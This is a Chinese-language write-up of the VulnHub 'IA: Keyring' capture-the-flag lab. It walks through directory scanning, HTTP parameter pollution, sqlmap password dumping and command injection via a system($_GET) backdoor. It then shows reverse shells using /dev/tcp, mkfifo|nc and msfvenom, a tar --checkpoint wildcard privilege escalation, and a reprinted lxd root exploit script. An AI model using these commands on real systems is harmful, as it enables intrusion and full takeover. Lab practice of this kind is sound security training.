靶机渗透练习87-IA：Keyring (1.0.1)

靶机描述

靶机地址：https://www.vulnhub.com/entry/ia-keyring-101,718/

Description

Difficulty: Intermediate

Goal: Get the root shell and read all the 2 flags.

Information: No hints will be provided before 24 hours of the release. Try Harder!

If you need any hints, you can contact us on Discord (0xMadhav#3119 or golith3r00t#1859)

After completing the machine, share the root proof and tag us on Twitter (@infosecarticles)

Tested on VirtualBox (This works better with VirtualBox rather than VMware)

This works better with VirtualBox rather than VMware. ## Changelog - 2021-06-30 - v1.0.1 (issue with privesec) - 2021-06-29 - v1.0.0

一、搭建靶机环境

攻击机Kali：

IP地址：192.168.9.3

靶机：

IP地址：192.168.9.4

注：靶机与Kali的IP地址只需要在同一局域网即可（同一个网段,即两虚拟机处于同一网络模式）

该靶机环境搭建如下

将下载好的靶机环境，导入 VritualBox，设置为 Host-Only 模式

将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only

二、实战

2.1网络扫描

2.1.1 启动靶机和Kali后进行扫描

方法一、arp-scan -I eth0 -l （指定网卡扫）

arp-scan -I eth0 -l

⬢  IA: Keyring  arp-scan -I eth0 -l
Interface: eth0, type: EN10MB, MAC: 00:50:56:27:27:36, IPv4: 192.168.9.3
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.1     0a:00:27:00:00:11       (Unknown: locally administered)
192.168.9.1     08:00:27:17:ac:54       PCS Systemtechnik GmbH (DUP: 2)
192.168.9.4     08:00:27:85:ee:9d       PCS Systemtechnik GmbH3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.985 seconds (128.97 hosts/sec). 3 responded

方法二、masscan 扫描的网段 -p 扫描端口号

masscan 192.168.184.0/24 -p 80,22

方法三、netdiscover -i 网卡-r 网段

netdiscover -i eth0 -r 192.168.184.0/24

方法四、等你们补充

2.1.2 查看靶机开放的端口

使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口

⬢  IA: Keyring  nmap -A -sV -T4 -p- 192.168.9.4
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-27 16:19 CST
Nmap scan report for bogon (192.168.9.4)
Host is up (0.00069s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8d:eb:fd:0a:76:8a:2a:75:6e:9b:6e:7b:51:c4:28:db (RSA)
|   256 53:31:35:c0:3a:a0:48:2f:3a:79:f5:56:cd:3c:63:ee (ECDSA)
|_  256 8d:7b:d3:c9:15:61:03:b1:b5:f1:d2:ed:2c:01:55:65 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:85:EE:9D (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE
HOP RTT     ADDRESS
1   0.69 ms bogon (192.168.9.4)OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.84 seconds

开放了22,80端口

2.2枚举漏洞

2.2.1 80 端口分析

访问：http://192.168.9.4/

注册一下

注册成功，尝试登录失败，尝试多次仍旧是失败，感觉是得在登录页面进行登录

扫描一下目录：

⬢  IA: Keyring  dirsearch -u http://192.168.9.4    _|. _ _  _  _  _ _|_    v0.4.2(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927Output File: /root/.dirsearch/reports/192.168.9.4/_22-04-28_09-43-42.txtError Log: /root/.dirsearch/logs/errors-22-04-28_09-43-42.logTarget: http://192.168.9.4/[09:43:42] Starting:
[09:43:43] 403 -  276B  - /.ht_wsr.txt
[09:43:43] 403 -  276B  - /.htaccess.save
[09:43:43] 403 -  276B  - /.htaccess.bak1
[09:43:43] 403 -  276B  - /.htaccess.orig
[09:43:43] 403 -  276B  - /.htaccess.sample
[09:43:43] 403 -  276B  - /.htaccess_sc
[09:43:43] 403 -  276B  - /.htaccess_extra
[09:43:43] 403 -  276B  - /.htaccessBAK
[09:43:43] 403 -  276B  - /.htaccess_orig
[09:43:43] 403 -  276B  - /.htaccessOLD2
[09:43:43] 403 -  276B  - /.htaccessOLD
[09:43:44] 403 -  276B  - /.htm
[09:43:44] 403 -  276B  - /.html
[09:43:44] 403 -  276B  - /.htpasswds
[09:43:44] 403 -  276B  - /.httr-oauth
[09:43:44] 403 -  276B  - /.htpasswd_test
[09:43:45] 403 -  276B  - /.php
[09:43:51] 302 -  561B  - /about.php  ->  index.php
[09:44:05] 302 -  561B  - /control.php  ->  index.php
[09:44:11] 302 -  561B  - /home.php  ->  index.php
[09:44:12] 200 -    3KB - /index.php
[09:44:12] 200 -    3KB - /index.php/login/
[09:44:15] 200 -    1KB - /login.php
[09:44:16] 302 -    0B  - /logout.php  ->  index.php
[09:44:29] 403 -  276B  - /server-status
[09:44:29] 403 -  276B  - /server-status/Task Completed

果然是找对页面

访问：http://192.168.9.4/login.php

输入注册账号登录

在http://192.168.9.4/control.php发现

HTTP Parameter Pollution or HPP in short is a vulnerability that occurs
due to passing of multiple parameters having same name

利用gobuster再扫一遍目录看看

⬢  IA: Keyring  gobuster dir -u http://192.168.9.4 -x html,zip,bak,txt,php --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.9.4
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,zip,bak,txt,php
[+] Timeout:                 10s
===============================================================
2022/04/28 09:49:57 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 3254]
/home.php             (Status: 302) [Size: 561] [--> index.php]
/login.php            (Status: 200) [Size: 1466]
/about.php            (Status: 302) [Size: 561] [--> index.php]
/history.php          (Status: 200) [Size: 31]
/logout.php           (Status: 302) [Size: 0] [--> index.php]
/control.php          (Status: 302) [Size: 561] [--> index.php]
/server-status        (Status: 403) [Size: 276]                ===============================================================
2022/04/28 09:56:03 Finished
===============================================================

发现新目录/history.php

访问一下，发现什么也没有，退出登录账户在查看一下该目录

联系得到提示HPP漏洞

感觉在/history.php后可以接参数或者是可以绕过

根据退出账户访问的回显，猜测这个php文件有个检测user的函数啥的

非登录状态只会回显这个，登录用户后

访问：http://192.168.9.4/history.php?user=hirak0

果然有东西

2.3漏洞利用

2.3.1 HPP漏洞利用

访问：http://192.168.9.4/history.php?user=admin

访问：https://github.com/cyberbot75/keyring

发现一些代码，下载到本地查看一下

查看about.php

⬢  html  cat about.php
<!DOCTYPE html>
<html>
<head>
<style>
ul {list-style-type: none;margin: 0;padding: 0;overflow: hidden;background-color: #333;
}li {float: left;
}li a {display: block;color: white;text-align: center;padding: 14px 16px;text-decoration: none;
}li a:hover {background-color: skyblue;
}
</style>
</head>
<body><ul><li><a class="active" href="home.php">Home</a></li><li><a href="control.php">Control</a></li><li><a href="about.php">About</a></li><li><a href="logout.php">Logout</a></li>
</ul></body>
</html><?php
session_start();
if(isset($_SESSION['name']))
{$servername = "localhost";$username = "root";$password = "sqluserrootpassw0r4";$database = "users";$conn = mysqli_connect($servername, $username, $password, $database);echo "This challege is created by <a href='https://www.infosecarticles.com' target='_blank'>infosecarticles</a> team";echo "<br><br><br>";echo "Hope you will enjoy the challenge :)";$name = $_SESSION['name'];$date =  date('Y-m-d H:i:s');$sql = "insert into log (name , page_visited , date_time) values ('$name','about','$date')";if(mysqli_query($conn,$sql)){echo "<br><br><br>";echo "Date & Time : ".$date;}
}
else
{header('Location: index.php');
}?>

得到数据库用户密码root | sqluserrootpassw0r4

⬢  html  cat control.php
Code for staging server<!DOCTYPE html>
<html>
<head>
<style>
ul {list-style-type: none;margin: 0;padding: 0;overflow: hidden;background-color: #333;
}li {float: left;
}li a {display: block;color: white;text-align: center;padding: 14px 16px;text-decoration: none;
}li a:hover {background-color: skyblue;
}
</style>
</head>
<body><ul><li><a class="active" href="home.php">Home</a></li><li><a href="control.php">Control</a></li><li><a href="about.php">About</a></li><li><a href="logout.php">Logout</a></li>
</ul></body>
</html><?php
session_start();
if(isset($_SESSION['name']))
{$servername = "localhost";$username = "root";$password = "sqluserrootpassw0r4";$database = "users";$conn = mysqli_connect($servername, $username, $password, $database);$name = $_SESSION['name'];$date =  date('Y-m-d H:i:s');echo "HTTP Parameter Pollution or HPP in short is a vulnerability that occurs<br>due to passing of multiple parameters having same name";$sql = "insert into log (name , page_visited , date_time) values ('$name','control','$date')";if(mysqli_query($conn,$sql)){echo "<br><br>";echo "Date & Time : ".$date;}system($_GET['cmdcntr']); //system() function is not safe to use , dont' forget to remove it in production .
}
else
{header('Location: index.php');
}
?>
⬢  html

发现system($_GET['cmdcntr']);

尝试进行命令执行：http://192.168.9.4/control.php?cmdcntr=whoami

执行失败

在看一下源码，看源码数据库用户是root，是不是目前注册的账户权限太低了？

再回到/history.php页面，刚才只是利用了HPP漏洞，user=admin 可能存在注入

2.3.2 SQL注入漏洞利用

sqlmap跑一下看看，这里因为只有登录才能能利用HPP，所以需要加上cookie

 sqlmap -u "http://192.168.9.4/history.php?user=admin" --cookie="PHPSESSID=qmnb59qcq0kttrl1m4fkvk7it1" --batch -f --dbs

成功跑除数据库为MySQL,以及数据库名

[10:42:01] [INFO] testing MySQL
[10:42:01] [INFO] confirming MySQL
[10:42:01] [INFO] the back-end DBMS is MySQL
[10:42:01] [INFO] actively fingerprinting MySQL
[10:42:01] [INFO] executing MySQL comment injection fingerprint
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: active fingerprint: MySQL >= 5.7comment injection fingerprint: MySQL 5.7.34
[10:42:01] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] users

这里咱们跑一下数据库users

sqlmap -u "http://192.168.9.4/history.php?user=admin" --cookie="PHPSESSID=qmnb59qcq0kttrl1m4fkvk7it1" --batch -f --dbms=mysql -D users --tables

成功跑出两个表

Database: users
[2 tables]
+---------+
| log     |
| details |
+---------+

这里咱们爆一下details的字段

sqlmap -u "http://192.168.9.4/history.php?user=admin" --cookie="PHPSESSID=qmnb59qcq0kttrl1m4fkvk7it1" --batch -f --dbms=mysql -D users -T details --col

成功得到两字段

Database: users
Table: details
[2 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| name     | varchar(20) |
| password | varchar(22) |
+----------+-------------+

爆值

sqlmap -u "http://192.168.9.4/history.php?user=admin" --cookie="PHPSESSID=qmnb59qcq0kttrl1m4fkvk7it1" --batch -f --dbms=mysql -D users -T details -C name,password --dump

成功爆出几个用户密码，其中有三个是我们创建的

Database: users
Table: details
[5 entries]
+--------+-----------------------+
| name   | password              |
+--------+-----------------------+
| admin  | myadmin#p4szw0r4d     |
| admin1 | 123456                |
| hirak0 | 123456                |
| john   | Sup3r$S3cr3t$PasSW0RD |
| test   | test                  |
+--------+-----------------------+

我们登录一下admin

再次访问：http://192.168.9.4/control.php?cmdcntr=whoami

发现成功执行命令

2.3.3 命令执行漏洞利用

咱们直接运行sh -i >& /dev/tcp/192.168.9.3/6666 0>&1

Kali中监听:nc -lvp 6666

直接访问：http://192.168.9.4/control.php?cmdcntr=sh -i >& /dev/tcp/192.168.9.3/6666 0>&1

发现没有反应

Url编码后试一下

访问:http://192.168.9.4/control.php?cmdcntr=sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.9.3%2F6666%200%3E%261

有反应了，但是没有弹出shell

换mkfifo试试

http://192.168.9.4/control.php?cmdcntr=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20192.168.9.3%206666%20%3E%2Ftmp%2Ff

还是不行，回去访问其他页面，发现不能访问了

看了靶机状态，没有异常，换个浏览器试试

⬢  IA: Keyring  nc -lvp 6666
listening on [any] 6666 ...
Warning: forward host lookup failed for bogon: Host name lookup failure : Resource temporarily unavailable
connect to [192.168.9.3] from bogon [192.168.9.4] 44842
sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

成功getshell

2.4权限提升

2.4.1 信息收集

升级TTYshell

$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")';
www-data@keyring:/var/www/html$

由于这里直接进来的是www-data用户，权限太低

咱们切换到之前得到的john用户

www-data@keyring:/var/www/html$ su john
su john Password: Sup3r$S3cr3t$PasSW0RDTo run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.john@keyring:/var/www/html$ id
id
uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)
john@keyring:/var/www/html$

这个权限可以干很多事了

查看一下sudo -l

john@keyring:/var/www/html$ sudo -l
sudo -lWe trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:#1) Respect the privacy of others.#2) Think before you type.#3) With great power comes great responsibility.[sudo] password for john: Sup3r$S3cr3t$PasSW0RDSorry, user john may not run sudo on keyring.
john@keyring:/var/www/html$

查看一下用户目录下都有啥吧

john@keyring:/home$ cd john
cd john
john@keyring:~$ ls -al
ls -al
total 48
drwxr-x--- 3 john john  4096 Apr 27 15:37 .
drwxr-xr-x 3 root root  4096 Jun  7  2021 ..
lrwxrwxrwx 1 john john     9 Jun 20  2021 .bash_history -> /dev/null
-rw-r--r-- 1 john john   220 Jun  7  2021 .bash_logout
-rw-r--r-- 1 john john  3771 Jun  7  2021 .bashrc
-rwsr-xr-x 1 root root 16784 Jun 20  2021 compress
drwx------ 3 john john  4096 Apr 27 15:37 .gnupg
-rw-r--r-- 1 john john   807 Jun  7  2021 .profile
-rw-rw-r-- 1 john john   192 Jun 20  2021 user.txt
john@keyring:~$ cat user.txt
cat user.txt[ Keyring - User Owned ]
----------------------------------------------
Flag : VEhNe0Jhc2hfMXNfRnVuXzM4MzEzNDJ9Cg==
----------------------------------------------
by infosecarticles with <3john@keyring:~$

成功拿到flag1，同时发现一个 compress 文件，下载下来查看一下

2.4.2 tar --checkpoint提权

本地kali上进行监听：nc -nlvp 8888 > compress

靶机上运行：cat /home/john/compress > /dev/tcp/192.168.9.3/8888

⬢  IA: Keyring  strings compress
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u+UH
[]A\A]A^A_
/bin/tar cf archive.tar *
:*3$"
GCC: (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.8060
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
tar.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
setgid@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.plt.sec
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment
⬢  IA: Keyring

发现执行了/bin/tar cf archive.tar *

拿去IDA查看一下源代码

int __cdecl main(int argc, const char **argv, const char **envp)
{setgid(0);setuid(0);system("/bin/tar cf archive.tar *");return 0;
}

差不多的意思就是会以 root权限把 ‘’ 压缩成 archive.tar 包

也就是说咱们可以利用 tar通配符注入（--checkpoint）来提权

kali本地使用 msfvenom 生成一个反弹 shell：

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.9.3 lport=1234 R

如下

⬢  IA: Keyring  msfvenom -p cmd/unix/reverse_netcat lhost=192.168.9.3 lport=1234 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 97 bytes
mkfifo /tmp/gscwbk; nc 192.168.9.3 1234 0</tmp/gscwbk | /bin/sh >/tmp/gscwbk 2>&1; rm /tmp/gscwbk

本地写入一个shell.sh

mkfifo /tmp/gscwbk; nc 192.168.9.3 1234 0</tmp/gscwbk | /bin/sh >/tmp/gscwbk 2>&1; rm /tmp/gscwbk

然后将其上传至靶机，依次运行

echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

最后运行compress

john@keyring:~$ wget http://192.168.9.3/shell.sh
wget http://192.168.9.3/shell.sh
--2022-04-27 16:38:40--  http://192.168.9.3/shell.sh
Connecting to 192.168.9.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 98 [text/x-sh]
Saving to: ‘shell.sh’shell.sh            100%[===================>]      98  --.-KB/s    in 0s      2022-04-27 16:38:40 (7.24 MB/s) - ‘shell.sh’ saved [98/98]john@keyring:~$ john@keyring:~$ ls
ls
compress  shell.sh  user.txt
john@keyring:~$ cat shell.sh
cat shell.sh
mkfifo /tmp/gscwbk; nc 192.168.9.3 1234 0</tmp/gscwbk | /bin/sh >/tmp/gscwbk 2>&1; rm /tmp/gscwbk
john@keyring:~$ echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > "--checkpoint-action=exec=sh shell.sh"
john@keyring:~$  echo "" > --checkpoint=1echo "" > --checkpoint=1
john@keyring:~$ ./compress
./compress

kali中监听:nc -lvp 1234

Keyboard interrupt received, exiting.
⬢  IA: Keyring  nc -lvp 1234
listening on [any] 1234 ...
Warning: forward host lookup failed for bogon: Host name lookup failure : Resource temporarily unavailable
connect to [192.168.9.3] from bogon [192.168.9.4] 47128
id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare),1000(john)
cd /root
ls
root.txt
cat root.txt[ Keyring - Rooted ]
---------------------------------------------------
Flag : VEhNe0tleXIxbmdfUjAwdDNEXzE4MzEwNTY3fQo=
---------------------------------------------------
by infosecarticles with <3

成功提权并拿到flag2

2.4.3 lxd提权

查看用户组发现lxd，同时发现lxc可用

john@keyring:/tmp$ id
id
uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)
john@keyring:/tmp$ which lxc
which lxc
/usr/bin/lxc
john@keyring:/tmp$ /usr/bin/lxc -h
/usr/bin/lxc -h
Description:Command line client for LXDAll of LXD's features can be driven through the various commands below.For help with any of those, simply call them with --help.Usage:lxc [command]Available Commands:alias       Manage command aliasescluster     Manage cluster membersconfig      Manage container and server configuration optionsconsole     Attach to container consolescopy        Copy containers within or in between LXD instancesdelete      Delete containers and snapshotsexec        Execute commands in containersfile        Manage files in containershelp        Help about any commandimage       Manage imagesinfo        Show container or server informationlaunch      Create and start containers from imageslist        List containersmove        Move containers within or in between LXD instancesnetwork     Manage and attach containers to networksoperation   List, show and delete background operationsprofile     Manage profilespublish     Publish containers as imagesremote      Manage the list of remote serversrename      Rename containers and snapshotsrestart     Restart containersrestore     Restore containers from snapshotssnapshot    Create container snapshotsstart       Start containersstop        Stop containersstorage     Manage storage pools and volumesversion     Show local and remote versionsFlags:--all           Show less common commands--debug         Show all debug messages--force-local   Force using the local unix socket-h, --help          Print help-v, --verbose       Show all information messages--version       Print version numberUse "lxc [command] --help" for more information about a command.

kali本地搜索一下：searchsploit lxd

将利用脚本复制到当前目录：searchsploit -m linux/local/46978.sh

查看其内容

⬢  IA: Keyring  cat 46978.sh
#!/usr/bin/env bash# ----------------------------------
# Authors: Marcelo Vazquez (S4vitar)
#          Victor Lasa      (vowkin)
# ----------------------------------# Step 1: Download build-alpine => wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine [Attacker Machine]
# Step 2: Build alpine => bash build-alpine (as root user) [Attacker Machine]
# Step 3: Run this script and you will get root [Victim Machine]
# Step 4: Once inside the container, navigate to /mnt/root to see all resources from the host machinefunction helpPanel(){echo -e "\nUsage:"echo -e "\t[-f] Filename (.tar.gz alpine file)"echo -e "\t[-h] Show this help panel\n"exit 1
}function createContainer(){lxc image import $filename --alias alpine && lxd init --autoecho -e "[*] Listing images...\n" && lxc image listlxc init alpine privesc -c security.privileged=truelxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=truelxc start privesclxc exec privesc shcleanup
}function cleanup(){echo -en "\n[*] Removing container..."lxc stop privesc && lxc delete privesc && lxc image delete alpineecho " [√]"
}set -o nounset
set -o errexitdeclare -i parameter_enable=0; while getopts ":f:h:" arg; docase $arg inf) filename=$OPTARG && let parameter_enable+=1;;h) helpPanel;;esac
doneif [ $parameter_enable -ne 1 ]; thenhelpPanel
elsecreateContainer
fi#

根据步骤来一遍就可以了，这边就不继续了

总结

本靶机通过信息收集找到HPP漏洞利用点，利用该漏洞收集到网站源码，发现存在命令执行漏洞，通过SQL注入漏洞拿到用户密码，利用命令执行漏洞Getshell，最后利用tar --checkpoint提权

信息收集
dirsearch、gobuster目录扫描
HPP漏洞
命令执行漏洞
SQL注入漏洞–SQLmap一把梭
tar --checkpoint提权